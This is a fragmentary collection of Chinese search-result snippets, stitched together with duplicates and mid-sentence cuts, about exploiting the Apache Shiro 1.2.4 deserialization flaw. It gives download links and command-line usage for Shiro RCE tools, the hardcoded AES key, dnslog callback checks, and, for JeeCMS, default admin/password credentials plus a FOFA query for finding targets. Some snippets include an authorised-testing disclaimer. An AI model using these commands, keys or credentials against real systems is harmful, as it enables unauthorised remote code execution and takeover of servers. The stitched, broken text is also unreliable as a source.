shiro_rce 下载地址:https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip 2020-10-16: 放出来一些功能: 1、spring/tomcat回显,执行命令的时候,x=whoami 就行 2、批量检测是否shiro, java -cp shiro_tool.jar shiro.Check http://url 或者 java -cp shiro_tool.jar shiro.Check urls=文件 3、目标...
这里我们可以通过eclipse或jd-gui对shiro的源码jar包(在后文环境搭建处有下载链接,解压之后的WEB-INF->lib->shiro-core-1.2.4.jar)进行查看(依次点开org.apache.shiro->mgt->AbstractRememberMeManager.class),不难看出这里密钥固定为kPH+bIxk5D2deZiIxcaaaA==: 密钥硬编码 环境搭建 因为实验机均为不出网的内网...
commandformatbase64 stringkey=-->seta shiro keyreq=-->request bodyfilerequest bodyfile抓包保存到文件里,这里写文件名keys=-->keysfile自定义key的文件,key按行分割,即每行写一个java-cpshiro_tool.jar shiro
shiro_rce java -cp shiro_tool.jar Shiro https://xx.xx.xx.xx nslookup/ping1/ping2/curl nocheck key=kPH+bIxk5D2deZiIxcaaaA== req=1.txt keys=key.txt nslookup/ping1/ping2/curl--> use nslookup dnslog.com check./use ping -c 1 dnslog.com check(default)./use ping -n 1 dnslog.com...
websec80 shiro_rce 利用 下载地址:https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip 2021-03-31: 新增自定义或随机useragent randomagent --> random useragent useragent= --> set useragent cookiename= --> default: rememberMe 2020-10-16:...
由于使用的Apache Shiro 是低版本的,存在shiro反序列漏洞。 漏洞影响 弱口令进入可获取后台权限, 反序列可rce 反弹shell 影响版本 版本<=9.3 fofaapp="jeecms" 漏洞复现 弱口令登录 访问默认后台登录路径 默认账号 admin/password /jeeadmin/jeecms/login.do ...
shiro_rce 声明: 此工具仅用于企业安全人员自查验证自身企业资产的安全风险,或有合法授权的安全测试,请勿用于其他用途,如有,后果自负。 download_url:https://share.feijipan.com/s/8iAurUKc 优化一些功能: 1、spring/tomcat回显,执行命令的时候,x=whoami 就行 2、批量检测是否shiro 3、目标服务器不出网的情况下...
shiro_rce 声明: 此工具仅用于企业安全人员自查验证自身企业资产的安全风险,或有合法授权的安全测试,请勿用于其他用途,如有,后果自负。 download_url:https://share.feijipan.com/s/8iAurUKc 优化一些功能: 1、spring/tomcat回显,执行命令的时候,x=whoami 就行 2、批量检测是否shiro 3、目标服务器不出网的情况下...
一个简单的Shiro RCE检测和利用脚本。 0x02 安装与使用 1、安装需要的包 pip install -r requirements.txt 2、检查该漏洞 pythonShiroRceTool.py -m scan-u "http://example.com" 3、执行命令 (不回显) python ShiroRceTool.py -m exploit -u "http://example.com" -c "ping dnslog.example.com" ...
那么我们可以构造一个带有恶意命令执行的链子来序列化后-->在通过AES加密-->base64编码,附带在cookie上发送过去,这样就能rce了。 0x02 漏洞分析 首先是要得知AES的密钥是什么,在shiro1.2.4及之前的AES密钥都是采用的硬编码(意思就是说密钥被写死在代码里面,是固定的),那么如何得到密钥呢?